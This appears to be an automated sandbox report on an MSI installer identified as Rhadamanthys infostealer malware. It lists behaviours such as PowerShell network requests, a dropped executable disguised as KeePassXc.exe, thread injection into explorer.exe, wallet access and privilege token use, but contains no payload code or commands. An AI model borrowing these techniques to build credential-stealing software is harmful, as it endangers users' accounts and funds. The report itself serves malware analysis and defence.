Analysis Overview
SHA256
67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c
Threat Level: Known bad
The file setup.msi was found to be: Known bad.
Malicious Activity Summary
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Downloads MZ/PE file
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates connected drives
Suspicious use of SetThreadContext
Command and Scripting Interpreter: AutoIT
Loads dropped DLL
Executes dropped EXE
Drops file in Windows directory
Program crash
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-01 21:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-01 21:53
Reported
2024-06-01 22:12
Platform
win10v2004-20240426-en
Max time kernel
272s
Max time network
278s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Downloads MZ/PE file
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
Command and Scripting Interpreter: AutoIT
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | \??\c:\st\Autoit3.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 3492 set thread context of 1988 | N/A | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\Installer\e5737c9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3856.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3952.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5737c9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI4D99.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5737cd.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI38F3.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3972.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI39B1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3A2F.tmp | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe | N/A |
| N/A | N/A | \??\c:\st\Autoit3.exe | N/A |
Loads dropped DLL
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | \??\c:\st\Autoit3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | \??\c:\st\Autoit3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-52#immutable1 = "Set the date, time, and time zone for your computer." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\Vault.dll,-1#immutable1 = "Credential Manager" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 = "Configure how speech recognition works on your computer." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\netcenter.dll,-1#immutable1 = "Network and Sharing Center" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-2#immutable1 = "Customize settings for the display of languages, numbers, times, and dates." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-601#immutable1 = "Indexing Options" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "2" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\GroupByKey:PID = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-2#immutable1 = "Protect your PC using BitLocker Drive Encryption." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-102#immutable1 = "Keyboard" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\DeviceCenter.dll,-1000#immutable1 = "Devices and Printers" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-1#immutable1 = "Power Options" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-1#immutable1 = "Phone and Modem" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-51#immutable1 = "Date and Time" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 1e007180000000000000000000006abe817b2bce7646a29eeb907a5126c50000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-2#immutable1 = "Recovery" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\intl.cpl,-3#immutable1 = "Region" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-7#immutable1 = "Change advanced color management settings for displays, scanners, and printers." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307} | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\Mode = "4" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\FirewallControlPanel.dll,-12123#immutable1 = "Set firewall security options to help protect your computer from hackers and malicious software." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-602#immutable1 = "Change how Windows indexes to search faster" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-1#immutable1 = "BitLocker Drive Encryption" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f706806ee260aa0d7449371beb064c986830000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-15#immutable1 = "Troubleshoot and fix common computer problems." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-300#immutable1 = "Sound" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\HotKey = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-52#immutable1 = "File History" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\recovery.dll,-101#immutable1 = "Recovery" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-301#immutable1 = "Configure your audio devices or change the sound scheme for your computer." | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\LogicalViewMode = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-2#immutable1 = "Conserve energy or maximize performance by choosing how your computer manages power." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-1#immutable1 = "User Accounts" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\autoplay.dll,-1#immutable1 = "AutoPlay" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\colorcpl.exe,-6#immutable1 = "Color Management" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\FFlags = "18874385" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\IconSize = "48" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\LogicalViewMode = "1" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\systemcpl.dll,-1#immutable1 = "System" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-2#immutable1 = "Change user account settings and passwords for people who share this computer." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-5#immutable1 = "View and update your device hardware settings and driver software." | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sdcpl.dll,-101#immutable1 = "Backup and Restore (Windows 7)" | C:\Windows\explorer.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | \??\c:\st\Autoit3.exe | N/A |
| N/A | N/A | \??\c:\st\Autoit3.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
